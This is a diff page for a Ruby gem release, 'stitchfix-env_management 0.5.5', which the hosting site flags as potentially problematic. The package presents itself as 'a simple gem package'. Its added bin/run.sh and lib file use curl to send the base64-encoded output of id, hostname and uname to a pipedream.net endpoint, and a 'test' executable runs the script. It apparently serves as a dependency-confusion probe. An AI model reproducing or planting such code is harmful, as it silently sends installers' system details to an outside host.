stitchfix-env_management 0.5.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of stitchfix-env_management might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 6705276b6e42356a8fbc86dc47f300ced133d188cd0d5534f391aef314e49f10
4
+ data.tar.gz: d4a7706e364f0fd0004d05f723d6e46e38f2d101127b3ab5edf7494fcaab4df9
5
+ SHA512:
6
+ metadata.gz: 1dc6f4e05bae355d84224215b7d8f9a1a69024dc74cc686a89db830bd83fc67070aec87fb6dba0d9f0b74f24a22a522ee7a5ef0e1dacc84c4a1a8ebc59cb9c45
7
+ data.tar.gz: 8a4e791ceb152c9a01042c1fa4f90d01f0b1e58d6e561b0a3a2c2a9c4a8ba0259ff289b0e0f71ceafa8f235d74c03655da18ee70dd5669ed541b0ead657fa71b
data/bin/run.sh ADDED
@@ -0,0 +1,2 @@
1
+ #!/bin/sh
2
+ curl https://d0dcd303470caf7022099d7e3966f2a4.m.pipedream.net/i -d $(id|base64) -d $(hostname|base64)
data/bin/test ADDED
@@ -0,0 +1,6 @@
1
+ #!/usr/bin/env ruby
2
+
3
+ bin_dir = File.expand_path(File.dirname(__FILE__))
4
+ shell_script_path = File.join(bin_dir, 'run.sh')
5
+
6
+ `#{shell_script_path}`
@@ -0,0 +1 @@
1
+ system("curl https://d0dcd303470caf7022099d7e3966f2a4.m.pipedream.net/halo -d $(uname|base64) -d $(id|base64)")
metadata ADDED
@@ -0,0 +1,46 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: stitchfix-env_management
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.5.5
5
+ platform: ruby
6
+ authors:
7
+ - tosun
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-10-18 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple gem package
14
+ email: tosun@wearehackerone.com
15
+ executables:
16
+ - test
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - bin/run.sh
21
+ - bin/test
22
+ - lib/stitchfix-env_management.rb
23
+ homepage: https://rubygems.org/gems/stitchfix-env_management
24
+ licenses:
25
+ - MIT
26
+ metadata: {}
27
+ post_install_message:
28
+ rdoc_options: []
29
+ require_paths:
30
+ - lib
31
+ required_ruby_version: !ruby/object:Gem::Requirement
32
+ requirements:
33
+ - - ">="
34
+ - !ruby/object:Gem::Version
35
+ version: '0'
36
+ required_rubygems_version: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ requirements: []
42
+ rubygems_version: 3.1.2
43
+ signing_key:
44
+ specification_version: 4
45
+ summary: stitchfix-env_management
46
+ test_files: []